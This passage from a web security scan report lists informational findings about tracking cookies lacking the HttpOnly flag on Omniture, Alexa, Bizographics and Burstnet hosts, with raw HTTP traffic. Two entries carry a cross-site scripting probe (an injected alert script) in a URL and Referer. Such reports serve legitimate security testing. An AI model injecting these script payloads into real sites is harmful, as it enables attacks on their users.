Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:28:56 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:28:56 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:28:56 GMT
Last-Modified: Wed, 15 Jun 2011 00:28:56 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6AB48-5AA3-24128C5D"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www117
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.41. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27362804291769  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s27362804291769

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s27362804291769?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A19%3A16%201%20300&ce=UTF-8&pageName=%2Fgames%2Farcade%2Findex.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&r=http%3A%2F%2Fwww.mtv.com%2Fshows%2Fteen_wolf%2Fseries.jhtml&ch=games&events=event16&h2=games%2Farcade%2Findex.jhtml&c5=non-member&c6=not%20logged-in&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=games&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&pid=%2Fonair%2Fteen_wolf%2Fseries.jhtml&pidt=1&oid=http%3A%2F%2Fwww.mtv.com%2Fgames%2Farcade%2F&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/games/arcade/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:19:23 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:19:23 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:19:23 GMT
Last-Modified: Wed, 15 Jun 2011 00:19:23 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A90B-23E7-27C8BEE7"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www171
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.42. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s27566767793614  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s27566767793614

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s27566767793614?AQB=1&ndh=1&t=13%2F5%2F2011%2019%3A17%3A54%201%20300&ce=UTF-8&pageName=%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml&g=http%3A%2F%2Fwww.mtv.com%2Fvideos%2Fmike-taylor%2F659420%2Fperfect.jhtml%23id%3D1518072&r=http%3A%2F%2Fwww.mtv.com%2Fmusic%2F&ch=videos&events=event16&c1=Mike%20Taylor&h2=videos%2Fmike-taylor%2F659420%2Fperfect.jhtml&c5=non-member&c6=not%20logged-in&c16=mv&c33=Monday&c34=7%3A00PM&c41=Repeat&v45=Monday&v46=7%3A00PM&v49=videos&s=1920x1200&c=32&j=1.6&v=Y&k=Y&bw=1065&bh=926&p=Shockwave%20Flash%3BJava%20Deployment%20Toolkit%206.0.240.7%3BJava(TM)%20Platform%20SE%206%20U24%3BSilverlight%20Plug-In%3BChrome%20PDF%20Viewer%3BGoogle%20Gears%200.5.33.0%3BWPI%20Detector%201.3%3BGoogle%20Update%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.mtv.com/videos/mike-taylor/659420/perfect.jhtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_jix60njix60=[CS]v4|26E7E93085160FDF-600001A4C0378917|4DCFD25E[CE]; s_vi_bahfbjx7Dlzx7Dvajxxx7C=[CS]v4|26EBD90485163C58-400001780015DA20|4DD7B207[CE]; s_vi_x60bafx7Bzx7Djmnaajx7Dx7C=[CS]v4|26EBD90585163FFF-400001A60017D693|4DD7B209[CE]; s_vi_x60kx60zeiaf=[CS]v4|26EFC6A30514BC1D-600001636001BB6C|4DDF8D43[CE]; s_vi_fptgfax7Dprgptax7Cx7Bqzzgfx27=[CS]v4|26F1169F0501294E-60000100C01AEF44|4DE22D3C[CE]; s_vi_x7Ehlx7Fx7Ex7Dlx7Fyx7Echz=[CS]v4|26F116C685012EE9-60000106A00109F0|4DE22D8B[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48E0705160A5B-60000183E001453B|4DE91C0D[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48E0705160A5B-60000183E001453D|4DE91C0D[CE]; s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26F48FF085012C77-600001092009679F|4DE91FE0[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F48FF085012C77-60000109200967A1|4DE91FE0[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26F55BD905162273-60000183A026495C|4DEAB7AF[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26F55BD905162273-60000183A026495E|4DEAB7AF[CE]; s_vi_snjbdhj=[CS]v4|26FAF8F5851D3A7D-60000144C0021CC5|4DF5F1E9[CE]; s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:17:59 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FAF912850127BE-6000011260007E57|4DF6A820[CE]; Expires=Sun, 12 Jun 2016 00:17:59 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 13 Jun 2011 00:17:59 GMT
Last-Modified: Wed, 15 Jun 2011 00:17:59 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF6A8B7-2795-26D30142"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www22
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.43. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s94813384910564

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s94813384910564?AQB=1&ndh=1&t=13%2F5%2F2011%2012%3A45%3A5%201%20300&ce=UTF-8&g=http%3A%2F%2Fhollywoodcrush.mtv.com%2Ffavicon.ico4bc7e%253C%2Fscript%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253E4e5acb99ae0&r=http%3A%2F%2Fhollywoodcrush.mtv.com%2Ffavicon.ico4bc7e%253C%2Fscript%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253E4e5acb99ae0&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1064&bh=782&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BJava%20Deployment%20Toolkit%206.0.240.7%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&pe=lnk_o&pev2=GLOBAL_NAV%20-%20Shows&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
Cookie: s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E4A3B485010447-40000104C02528FD|4DE9202B[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E4A3B485010447-40000104C02528FF|4DCBEC0F[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E4A3B485010447-40000104C0252901|4DCBEC0F[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E4A3B485010447-40000104C0252903|4DCBEC0F[CE]; s_vi_x7Fbynyjhx60hdf=[CS]v4|26E8932C05013A3F-4000010D601C5BFC|4DD12656[CE]; s_vi_x7Exxiexxzlcd8=[CS]v4|26E936F105010E6D-400001094010E770|4DD26DDE[CE]; s_vi_sudhuw5=[CS]v4|26E936F105010E6D-400001094010E772|4DD26DDE[CE]; s_vi_sq9x60qwx7Czx7Bxxx7Bsx7Dgx609vxxx7Bs=[CS]v4|26E9450985013445-60000111A028A0F7|4DD28A11[CE]; s_vi_jhx20ehlayetx60lj=[CS]v4|26E9450B05010169-6000011420003628|4DD28A12[CE]; s_vi_x60bx2A5770=[CS]v4|26E944E80501139F-400001146012D548|4DD289CE[CE]; s_vi_dzgdlx7Bjfd=[CS]v4|26F337640516051F-40000183803A84E3|4DE66EC8[CE]; s_vi_dinydefxxelh=[CS]v4|26F3ECFC85010184-60000102A027FC52|4DE7D9F7[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48EA28515A39E-60000176E0013A13|4DE94838[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48EA28515A39E-60000176E0013A15|4DE94838[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F4901685012D6D-60000108602DDC58|4DE9202B[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:45:08 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FB2652050110F1-60000111E00FD64C|4DF64CA3[CE]; Expires=Sat, 11 Jun 2016 17:45:08 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 12 Jun 2011 17:45:08 GMT
Last-Modified: Tue, 14 Jun 2011 17:45:08 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF64CA4-21CD-03D94B21"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www143
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.44. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s9683568101997  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /b/ss/viamtv/1/H.22.1/s9683568101997

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/viamtv/1/H.22.1/s9683568101997?AQB=1&ndh=1&t=13%2F5%2F2011%2012%3A45%3A5%201%20300&ce=UTF-8&g=http%3A%2F%2Fhollywoodcrush.mtv.com%2Ffavicon.ico4bc7e%253C%2Fscript%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253E4e5acb99ae0&r=http%3A%2F%2Fhollywoodcrush.mtv.com%2Ffavicon.ico4bc7e%253C%2Fscript%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253E4e5acb99ae0&s=1920x1200&c=24&j=1.7&v=Y&k=Y&bw=1064&bh=782&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BJava(TM)%20Platform%20SE%206%20U24%3BJava%20Deployment%20Toolkit%206.0.240.7%3BSilverlight%20Plug-In%3BWPI%20Detector%201.3%3B&pe=lnk_o&pev2=GLOBAL_NAV%20-%20Shows&pid=http%3A%2F%2Fhollywoodcrush.mtv.com%2Ffavicon.ico4bc7e%253C%2Fscript%253E%253Cscript%253Ealert(%2522FAVICON%2522)%253C%2Fscript%253E4e5acb99ae0&oid=http%3A%2F%2Fwww.mtv.com%2Fontv%2F&ot=A&AQE=1 HTTP/1.1
Host: viamtv.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://hollywoodcrush.mtv.com/favicon.ico4bc7e%3C/script%3E%3Cscript%3Ealert(%22FAVICON%22)%3C/script%3E4e5acb99ae0
Cookie: s_vi_ufiiknyfx7Chcx60mnc=[CS]v4|26E4A3B485010447-40000104C02528FD|4DE9202B[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmqljpxxjmx7Euvx7Bxxu=[CS]v4|26E4A3B485010447-40000104C02528FF|4DCBEC0F[CE]; s_vi_kxxwwupgxxbrbssx7Dx7Evb=[CS]v4|26E4A3B485010447-40000104C0252901|4DCBEC0F[CE]; s_vi_wdkkilx7Bdx7Ejhhf=[CS]v4|26E4A3B485010447-40000104C0252903|4DCBEC0F[CE]; s_vi_x7Fbynyjhx60hdf=[CS]v4|26E8932C05013A3F-4000010D601C5BFC|4DD12656[CE]; s_vi_x7Exxiexxzlcd8=[CS]v4|26E936F105010E6D-400001094010E770|4DD26DDE[CE]; s_vi_sudhuw5=[CS]v4|26E936F105010E6D-400001094010E772|4DD26DDE[CE]; s_vi_sq9x60qwx7Czx7Bxxx7Bsx7Dgx609vxxx7Bs=[CS]v4|26E9450985013445-60000111A028A0F7|4DD28A11[CE]; s_vi_jhx20ehlayetx60lj=[CS]v4|26E9450B05010169-6000011420003628|4DD28A12[CE]; s_vi_x60bx2A5770=[CS]v4|26E944E80501139F-400001146012D548|4DD289CE[CE]; s_vi_dzgdlx7Bjfd=[CS]v4|26F337640516051F-40000183803A84E3|4DE66EC8[CE]; s_vi_dinydefxxelh=[CS]v4|26F3ECFC85010184-60000102A027FC52|4DE7D9F7[CE]; s_vi_tghhjoxxgx7Dkykke=[CS]v4|26F48EA28515A39E-60000176E0013A13|4DE94838[CE]; s_vi_cpx7Fx7Fx7Dxxopjx7Cwmx7Ckikpjx7Cx7Euvx7Bxxu=[CS]v4|26F48EA28515A39E-60000176E0013A15|4DE94838[CE]; s_vi_tghhjoxxgx7Dx7Emcoi=[CS]v4|26F4901685012D6D-60000108602DDC58|4DE9202B[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:45:09 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_pogkrp=[CS]v4|26FB265285012DDF-4000011560195241|4DF64CA4[CE]; Expires=Sat, 11 Jun 2016 17:45:09 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 12 Jun 2011 17:45:09 GMT
Last-Modified: Tue, 14 Jun 2011 17:45:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4DF64CA5-5BAC-64456BC1"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www171
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;
12.45. http://www.alexa.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alexa.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.alexa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lv=1307189053; __utmz=115222615.1307189057.1.1.utmcsr=abouturl.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=115222615.2052008441.1307189057.1307189057.1307189057.1

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
Set-Cookie: rpt=%21; expires=Wed, 15-Jun-2011 01:28:41 GMT; domain=alexa.com
Set-Cookie: lv=1308011321; expires=Wed, 13-Jun-2012 06:28:41 GMT; path=/; domain=alexa.com
Vary: Accept-Encoding
Content-Length: 16431
Connection: close
Date: Tue, 14 Jun 2011 00:28:41 GMT
Server: httpd

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
12.46. http://www.bizographics.com/collect/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /collect/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /collect/?fmt=gif&url=wsj.com&pid=317&rnd=1227491837926209 HTTP/1.1
Host: www.bizographics.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/public/resources/documents/PixelTracking.html?site=interactive.wsj.com&zone=tech_front&pageId=0_0_WP_2200&cb=883697
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoNetworkPartnerIndex=3; BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0eegii5ngkZAFExkNK7HUtFp4B4dlWpgdiiC2v8NccltET8l3ZY0x538DagN4siiD1aaCmzSiiJQK8lykQMu396nckTo4nxwoHo0CoRZSiif2tsuiicEnxS3cJipCVZ8TsalisgS9TXOCwHZXFvbNlR3nLMBjvmjkMkiiS8VeiijpGQmKo0yuNJRFsRyXovJBpP1LisJ3SSZWr1XIQIIGVWMEmHtfZh73BiitkUr3XlAiscQyzlKxEyj6p6QYsvgf51m9Da6XiirwxBVxp0nP77W3oMweEdXU6bnuSFykW54FN6yii1oRyCQGqk84Nzl6iivmHYAZUugJ8wSyDpwAsYYmSo3LDnHii2Cip8QnOcWG7PlEjokDX1b7LIGtQieie

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Content-Language: en-US
Date: Tue, 14 Jun 2011 00:13:56 GMT
Location: http://img.bizographics.com/1x1.gif
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=3c403c93-d95c-49df-9ac2-80ec4d87e192; Domain=.bizographics.com; Expires=Tue, 13-Dec-2011 12:13:56 GMT; Path=/
Set-Cookie: BizoData=AceyGjXAruisipsmZAT3ZKk9Qb1MaQBj6WisqThbDTBp4B2VrCIGNp5RVO9z4XipLmXyvHipHCqwrNYQnSLfO0fWLyTcgvE2yQ6Ze1pbZ033FKv3YPdeKubByYtiikBBmWL9vy8qeiiV0HIm4nYPdeKubByYsTG1iiA4HFhaObXcis5ip6FU7wE4Cwiib580ipET68lwNWsfNIUXfAULHZeWiinnp8DesekBgQXcy3tgL326ELqfmQZU2ueTC3wAqip042iirMZRzHxvSTtisvHuK6gvBr0Pej7isVgBvV8Kk0mwBbXkU4HujvywisJd2WNMedisMgTj03JcHP8nOcWG7PlEjoggxAnMEZgmfujiiwd7OBYhLnmqoZbsnNXFrLu9efHlOsWD3viiCAgYAghYxv0EPdR9KLjw34ANmJisipoEKzRnoN2kisFipn0SmXcpqPldy6c1wwIOnACxhiiZKjPFbQPWovaWUipNN9QFd9eD4OnACxhiiZKjFbQEPZ8RywpanugMm4hIisHF8ipo0I9mx5t08YADUXDkiigPUiiKWBw7T81HeReHfLTisiiisV8xMd5is5La2EsecOiiswIOnACxhiiZKjZaTdMSAamf236fFiiolkC0OCwcaIYpAt5LXM0XIwCmlb9oLhkw16YkipCwcaIYpAt5WoPvGg4qipctjJkmu5ePipiiMaODe9cOOkiihdML7elZkd0OC52PD2YWGqMTlyYtq6ZaRfZf5eQkf2ovdhChExDfe35GyRzNlvLnotcIy4PNP83xecbst1iib7gFsDSqDpxImEGrfTPfpgZUI4cd9sW5wsAHescjFAyxuEGrfTPfpgZXwYXPBFhecOvsiim5vOPNb106OGBImB2putC69uElEwF27JCOiioj1KhgUUhrqOIuN5aBiiOnqpc8IV71Rjsv7Qu4issSdo1Daipe0LyJwxxR2So1ExkNK7HUtFp4B4dlWpgdjiitVjmZ1zW4j8l3ZY0x538ism9qBDYo7JFUsjoCeA3EOXnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa4RXxZnzMYL5lop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtRSTI80GqzWbM6jqUuMlvisCEVUJBxdqAyBlRxxKsMZXIqipS0JipOOoD0R50a7lE1cBQipNN9QFd9eD7q0ii95BlORQkTqQOyFqsEcggxAnMEZgmSj4bIddpEGisTfkPzrOvT6EHuRZNgOOtPKCBwYlvwyxBTxBmxysG3aTEKOduu6SE3HipAaq47ss9D2D3XiirmwcmKlBdv1ZVcwOipUiiqfwoqJRljWvSvhZfgeAie; Domain=.bizographics.com; Expires=Tue, 13-Dec-2011 12:13:56 GMT; Path=/
Content-Length: 0
Connection: keep-alive

12.47. http://www.burstnet.com/burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.burstnet.com
Path:   /burstnetwork/display/s=21868/a=t/v=4.0S/sz=1X1A/BCPG173588.250890.299265/

Issue detail

